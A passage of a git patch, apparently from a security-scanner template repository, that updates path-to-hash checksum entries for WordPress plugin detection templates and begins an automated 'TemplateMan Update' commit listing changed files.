-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 -http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6483,7 +6485,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:ca292448de9ef71abd0514760d7b8c70ab3d90f6 +templates-checksum.txt:49c6ed69a74c85d0fa3402b94e73fb2cfc94f03b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From fb4a56b984dfa3501ff569e9befac153207b146f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jul 2023 14:53:57 +0000 Subject: [PATCH 277/609] TemplateMan Update [Sun Jul 2 14:53:57 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + 